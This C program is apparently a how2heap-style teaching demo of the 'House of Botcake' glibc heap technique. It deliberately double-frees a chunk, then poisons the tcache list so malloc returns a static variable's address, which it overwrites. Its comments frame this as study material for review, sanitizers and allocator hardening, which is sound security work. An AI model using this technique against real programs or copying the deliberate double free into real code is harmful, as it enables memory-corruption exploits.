#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
/* The word main() tries to overwrite through the allocator. Static storage
 * is zero-initialised, so the "Before attack" line prints 0. */
static uint64_t victim;
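/*
 * how2heap-style demonstration of the "House of Botcake" heap technique:
 * one double free of a tcache-sized chunk is turned into two overlapping
 * chunks, and the overlap is used to make malloc() hand back the address
 * of the static `victim`, which is then overwritten.
 *
 * The program is deliberately broken: the second free(b) in step 4 is the
 * double free the whole sequence depends on. It is useful for seeing what
 * such a bug gives an attacker, so that code review, sanitizer builds and
 * allocator hardening can be aimed at exactly that bug class.
 *
 * The step messages are the program's own. The request sizes and the
 * 0x110 offset in step 4 assume the chunk layout of the glibc this was
 * written against -- confirm against the target allocator before reading
 * anything into the printed results.
 *
 * Returns 0 after printing `victim` before and after the overwrite.
 */
int main(void)
{
    /* Unbuffered stdio so every step message is seen even if a later step
     * aborts, e.g. when an allocator sanity check fires on the double free. */
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    printf("Inspired by how2heap\n");
    printf("You can use this technique to create chunk overlap, only relies on double free.\n");

    printf("\n1. Alloc 7 chunks to fill up tcache list\n");
    /* Seven 0x100-byte chunks; step 3 frees them all to fill the tcache
     * list for that size (see that step's message). */
    char *x[7];
    for (int i = 0; i < 7; i++) {
        x[i] = malloc(0x100);
    }

    printf("\n2. Prepare two chunk with the same size as befor, for consolidation in unsortedbin\n");
    char *a = malloc(0x100);
    char *b = malloc(0x100);
    printf("Padding chunk to prevent consolidation\n");
    /* Result intentionally discarded: the chunk only serves as the padding
     * the message above describes. */
    (void)malloc(0x10);

    printf("\n3. Fill in the tcache list and consolidation two prepared chunk in unsortedbin\n");
    for (int i = 0; i < 7; i++) {
        free(x[i]);
    }
    /* First, legitimate release of b, then a. */
    free(b);
    free(a);

    printf("\n4. Get a chunk from tcache list and make chunk overlap\n");
    (void)malloc(0x100);
    /* DOUBLE FREE: b was already released in step 3. This is the memory-safety
     * bug the technique needs. An AddressSanitizer build reports it as a
     * double-free at this line, which is the cheap way to catch it in review. */
    free(b);
    printf("Now, chunk %p will be freed into tcache list\n", (void *)b);
    /* Per the message below, 0x130 is not served from the tcache list, so the
     * request comes from the unsorted bin and the result overlaps b. */
    char *res = malloc(0x130);
    printf("Size is not matched with tcache list, so get chunk from unsortedbin, which makes chunk overlap\n");
    /* Writes &victim through the overlap. 0x110 is the assumed distance to the
     * overlapped chunk's data -- allocator/version specific, verify. */
    *(uint64_t *)(res + 0x110) = (uint64_t)(&victim);
    printf("Now, you can control tcache list to alloc arbitrary address\n");
    (void)malloc(0x100);
    /* If the technique worked, target == &victim, so the store below lands in
     * victim -- that is what the "After attack" line shows. */
    char *target = malloc(0x100);
    /* PRIx64 rather than %lx: victim is uint64_t, which is not `unsigned long`
     * on every ABI, and <inttypes.h> is already included for exactly this. */
    printf("Before attack, victim's value: 0x%" PRIx64 "\n", victim);
    *(uint64_t *)target = 0xdeadbeef;
    printf("After attack, victim's value: 0x%" PRIx64 "\n", victim);
    return 0;
}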